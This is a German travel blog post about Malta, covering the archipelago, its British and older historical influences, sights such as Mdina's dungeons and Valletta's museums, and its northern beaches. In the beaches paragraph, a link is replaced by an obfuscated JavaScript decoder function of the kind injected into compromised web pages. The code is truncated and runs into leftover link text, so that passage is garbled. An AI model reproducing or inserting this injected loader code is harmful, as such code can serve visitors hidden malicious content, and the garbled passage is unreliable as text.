Urlaubziele im Mittelmeer: Malta

Die Insel Malta gehört zum maltesischen Archipel, einer Inselgruppe, die ca. 90 Kilometer südlich vor Sizilien im Mittelmeer liegt. Zu der Inselgruppe gehören neben Malta auch noch Fifla, Gozo, Comminotto und Comino. Die Inseln des maltesischen Archipels haben alle einen ganz eigenen Charakter und unterschieden sich in verschiedenen Aspekten.

Malta war lange Zeit von England besetzt und die Einflüsse aus dieser Zeit sind noch heute allgegenwärtig. So können in der Regel alle Malteser perfekt Englisch sprechen. Dadurch ist die Insel ein sehr bliebtes Ziel für Sprachreisen, da das mediterane Klima für die meisten Menschen sehr viel angenehmer ist, als das Klima in England. Doch auch zahlreiche andere Völker wie die Araber, Römer, Griechen, Phönizier, Karthager und Byzantiner haben ihre Spuren auf Malta hinterlassen, so dass es heute jede Menge Sehenswürdigkeiten auf der Insel gibt.

Valletta/Malta (Bild: Susanne Schmich  / pixelio.de)
Blick auf Valletta (Malta) / Bild: Susanne Schmich / pixelio.de

Sehenswürdigkeiten auf Malta

Da auf Malta zahlreiche große Völker ihre Spuren hinterlassen haben, gibt es nahezu unzählige prähistorische Artefakte, die im Archäologiemuseum von Valetta begutachtet werden können. Auch die alten Kriegsschauplätze wie der Mgarr-Bunker, die Tempelanlage Mnajdra im Süden Maltas, die Mdinaer Kerker oder die verschiedenen unterirdische Katakomben sollte man sich nicht entgehen lassen. TIPP: In den Mdinaer Kerkern gibt es eine lebensechte Ausstellung, die die (grausige) Vergangenheit darstellt.

Im National Museum of Fine Arts kann man Kunstwerke der Frührenaissance bestaunen. Gerade die Kunstsammlung und die Architektur der Insel, die während des 17. und 18. Jahrhunderts entstand, hat Malta zu einem Weltbekannten Kunst- und Kulturzentrum gemacht. Bedeutende Bauten sind z.B. der heutige Sitz des Parlaments, der "Großmeisterpalast" oder die restaurierte Festungsanlage "St. James Centre for Creativity".

Baden auf Malta

Zwar ist Malta keine klassische Badeinsel, d.h. die Badestrände liegen in der Regel nicht direkt vor dem Hotel, sondern man muss erst ein Stück mit dem Bus oder Auto zurücklegen, bevor man im Meer baden kann. Dennoch gibt es gerade im Norden der Insel einige sehr schöne Badestrände. Dabei handelt es sich insbesondere um kleine Sandstrände oder Felsstrände, von denen manche in wirklich wundervollen kleinen Buchten liegen. Eine sehr schöne Übersicht über die Sandstrände auf Malta gibt es auf function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandstrande.html" title="malta-aktuell.com" target="_blank">malta-aktuell.com.

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg